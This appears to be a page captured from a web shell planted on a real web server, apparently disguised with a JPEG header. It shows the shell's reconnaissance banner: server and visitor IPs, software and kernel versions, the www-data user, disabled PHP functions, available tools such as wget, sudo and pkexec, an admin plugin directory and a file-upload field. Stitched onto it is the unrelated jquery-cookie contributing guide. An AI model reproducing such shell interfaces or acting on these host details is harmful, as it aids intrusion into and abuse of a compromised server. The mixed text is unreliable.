����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 74.208.127.88 / Your IP : 3.135.211.95 Web Server : Apache/2.4.41 (Ubuntu) System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64 User : www-data ( 33) PHP Version : 7.4.3-4ubuntu2.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/html/admin/assets/plugins/jquery-cookie/ |
Upload File : |
##Issues - Report issues or feature requests on [GitHub Issues](https://github.com/carhartl/jquery-cookie/issues). - If reporting a bug, please add a [simplified example](http://sscce.org/). ##Pull requests - Create a new topic branch for every separate change you make. - Create a test case if you are fixing a bug or implementing an important feature. - Make sure the build runs successfully. ## Development ###Tools We use the following tools for development: - [Qunit](http://qunitjs.com/) for tests. - [NodeJS](http://nodejs.org/download/) required to run grunt and the test server only. - [Grunt](http://gruntjs.com/getting-started) for task management. ###Getting started Install [NodeJS](http://nodejs.org/). Install globally grunt-cli using the following command: $ npm install -g grunt-cli Browse to the project root directory and install the dev dependencies: $ npm install -d To execute the build and tests run the following command in the root of the project: $ grunt You should see a green message in the console: Done, without errors. ###Tests You can also run the tests in the browser. Start a test server from the project root: $ node test/server.js Open the following URL in a browser: $ open http://0.0.0.0:8124/test/index.html _Note: we recommend cleaning all the browser cookies before running the tests, that can avoid false positive failures._ ###Automatic build You can build automatically after a file change using the following command: $ grunt watch